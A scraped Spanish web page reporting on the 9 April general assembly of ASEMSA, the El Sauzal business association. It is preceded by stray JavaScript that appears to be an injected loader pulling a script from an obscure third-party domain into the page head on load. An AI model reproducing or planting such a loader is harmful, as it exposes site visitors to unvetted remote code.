, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Celebración Asamblea General de ASEMSA

El pasado sábado 9 de abril, la Asociación de Empresarios de EL Sauzal, celebró su Asamblea General Ordinaria, reseñando en su Orden del Día el informe del Sr. Presidente que viene a resumir la gestión de la Asociación en estos dos años de trabajo. Además, en la citada Asamblea se trataron los siguientes aspectos:

• Las cuentas del ejercicio pasado (año 2010) y el presupuesto del presente año, se informó sobre la concesión de la Subvención de ZCA de de carácter Público para el 2011
  • La memoria del año 2010
  • La vigencia de los convenios de prestaciones y servicios a los asociados en condiciones preferentes
  • El reconocimiento a la Sra. Concejal de Comercio Dña. Carmen Nieves Álvarez por su labor con el Comercio del municipio y con la Asociación